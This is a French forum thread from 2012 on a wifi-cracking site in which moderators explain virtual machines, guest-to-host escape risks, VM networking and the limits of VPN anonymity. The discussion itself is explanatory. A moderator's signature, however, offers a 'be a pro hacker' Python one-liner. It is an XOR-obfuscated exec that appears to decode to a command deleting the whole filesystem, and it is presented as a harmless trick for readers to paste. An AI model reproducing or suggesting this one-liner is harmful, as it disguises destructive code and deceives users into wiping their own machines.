Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-02-2012 08:15:49

Willywpl
Membre Actif

Machine Virtuelle

Bonjour à toutes et à tous!
Quelles sont les utilités d'une machine virtuelle ?
Peut-on attraper des virus vià sa machine virtuelle ?

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-02-2012 09:18:12

spawn
Modérateur

Re : Machine Virtuelle

Bonjour !

Une machine virtuelle te permet d'émuler un PC dans ton PC.
Pratique pour utiliser linux depuis Windows ou réciproquement.
Mac OS s'émule très difficilement , mais les programmes de virtualisation (ex Virtualbox ) existent pour toutes les plateformes.

Pour l'instant non, ce n'est pas encore arrivé.
Certains OS arrivent à détecter qu'ils sont virtualisés mais c'est à peu près tout.
Le seul moyen d'attraper un virus à travers une machine virtuelle connectée à internet, c'est quand elle attrape un virus et le colle dans un dossier partagé avec ton PC physique.
La protection ultime est donc de ne pas créer de dossier partagé.

J'ai répondu à ta question ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 16-02-2012 11:55:07

Willywpl
Membre Actif

Oui tu as répondu à ma question et je te remercie !
Grâce à notre machine virtuelle, si j ai bien compris, on peut télécharger des logiciels inféctés et les tester sans aucun risque?
Par exemple, je voulais tester ce que donnait une attaque BRUTEFORCE, pour retrouver ses mots de passe.
En revanche, sur windows, il n'y a pas 36000 alternatives, j ai juste entendu parlé de BRUTUS.
Mais celui-ci, d'après mon anti-virus, contient un virus.
Puis-je le tester et le télécharger sur mon pc virtuel sans risque ?

#4 16-02-2012 13:02:59

kcdtv
Membre d'honneur
Lieu : Internacionaluña

@ Willywpl
Le but de la rubrique "Place à la discussion" n'est pas de parler de thèmes qui rentrent dans de les autres rubriques. wink
Pour ce qui est de tes messages d'alertes, ne te préoccupes pas si tu est sûr des sources, pas mal d'antivirus s'alarment pou rien avec les tools de hack.

#5 16-02-2012 19:09:58

Willywpl
Membre Actif

Je suis désolé... J ai du mal à savoir où positioner mes sujets...

#6 16-02-2012 19:24:38

M1ck3y
Administrateur
Lieu : Lost in the darkness

Hop hop hop! Ce que dit spawn est vrai dans 99% des cas, mais il faut savoir qu'une machine virtuelle n'est pas exactement comme une véritable machine isolée à 100% du host. En cherchant un peu tu peux trouver quelques papers qui montrent qu'il est possible à un virus de bypasser la barrière "guest - host" sous vmware worstation par exemple.

La preuve:
-Cloudburst pdf
-VMWare Cloud Burst exploit video

J'avais lu un article plus intéressant et plus récent sur ce genre de chose mais je ne sais plus ou, je laisse ceux que ça intéresse chercher mais il existe d'autres poc dans ce style c'est garanti.

Sans compter le bypass avec exploit permettant l'éxécution de code sur le host depuis le guest, une machine virtuelle peut se trouver connectée au réseau de la machine host, ce qui est propice à du sniffing, mitm, corruption de dns et autres attaques menant à rooter le host ou au moins récupérer des infos.

Je finirais en précisant que certains virus / malwares savent reconnaitre qu'ils sont éxécutés dans l'environnement d'une machine virtuelle et modifier leur comportement en conséquence, en gros les développeurs de ces malwares ont prévu le fait que leur soft puisse etre éxécuté sur une VM et ont trouvé des parades pour essayer de prendre quand meme le controle de la machine hote.

Il ne faut pas sombrer dans la paranoia, une machine virtuelle ou une sandbox est en général assez secure pour faire des tests, mais le risque zéro n'existe pas...

Donc pour répondre à tes questions:

Une machine virtuelle permet d'émuler une ou plusieurs machines, avec une seule machine physique. Ca te permet par exemple de te constituer un réseau de plusieurs serveurs avec un seul ordi, ou bien d'avoir plusieurs machines avec différents OS qui tournent simultanément sur une seule machine physique. Les applications de la virtualisation sont très nombreuses.

Oui il est possible de choper un virus ou un malware depuis une machine virtuelle, meme si ce risque est relativement limité.

#7 16-02-2012 20:14:03

Willywpl
Membre Actif

J'ai appris énormément de choses grâce à ta réponse, je te remercie.
Mais une machine virtuelle a t-elle une adresse IP? Parce que vu qu'elle est virtuelle, je me demandais donc si quelque chose de virtuel avait une adresse réelle. Ce serait louche non?
Si oui, a t-elle la même IP que son hôte?

Merci

Dernière modification par Willywpl (16-02-2012 20:16:27)

#8 16-02-2012 20:22:51

M1ck3y
Administrateur

Oui bien sur une machine virtuelle peut avoir une carte réseau virtuelle et donc etre connectée au sein d'un réseau, avec une adresse ip comme n'importe quel ordinateur normal. Selon la configuration réseau utilisée tu peux avoir une ip différente de l'hote ou bien utiliser sa connexion.

#9 16-02-2012 20:45:10

Willywpl
Membre Actif

Une carte réseau virtuelle ? C est donc grâce à ça que les hackers arrivent à être à anonymes non?

#10 16-02-2012 21:03:17

M1ck3y
Administrateur

Absolument pas. Une carte réseau, virtuelle ou non, ne permet pas "aux hackers d'etre anonymes". Ce qui permet un certain anonymat c'est d'utiliser un VPN, un proxy ou une chaine de proxys, ou bien tor par exemple.

#11 16-02-2012 21:09:45

Willywpl
Membre Actif

H.S: Comment expliquer l'arrestation de certains hackers alors qu'ils utilisaient un VPN etc?

Et lorsqu'une machine virtuelle est connecté sur le réseau, elle compte comme un ordinateur supplémentaire connecté sur le réseau? Par exemple ma livebox est limitée à 3 connections simultanées il me semble.
Si je connecte 2 autres ordis avec ma machine + ma machine virtuelle, cela ne va donc pas fonctionner?

#12 16-02-2012 21:16:46

M1ck3y
Administrateur

Les VPN conservent des logs, les FAI conservent des logs, d'une manière ou d'une autre il est toujours possible de remonter à une machine meme si ça peut etre long et laborieux.

Oui une machine virtuelle connectée sur un réseau est exactement la meme chose qu'un ordinateur normal connecté sur un réseau. Pour ton routeur ce sera une machine supplémenatire un point c'est tout.

#13 16-02-2012 21:23:43

Willywpl
Membre Actif

Peut-on éteindre son ordinateur hôte tout en laissant l'ordinateur virtuel allumé? Ceci pourrait être intéressant pour une attaque bruteforce qui pourrait durer plusieurs heures!

#14 16-02-2012 21:28:13

M1ck3y
Administrateur

Bien sur que non, je crois que tu n'as toujours pas bien saisi le principe d'une machine virtuelle. L'émulation est software, donc pour que la machine virtuelle puisse exister il faut obligatoiremet une machine hote qui l'héberge. De la meme manière tu ne pourras pas te connecter à un serveur ftp sur un ordinateur éteint! lol

#15 16-02-2012 21:33:07

Willywpl
Membre Actif

C'était ce que je pensais. Merci pour tes réponses !

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]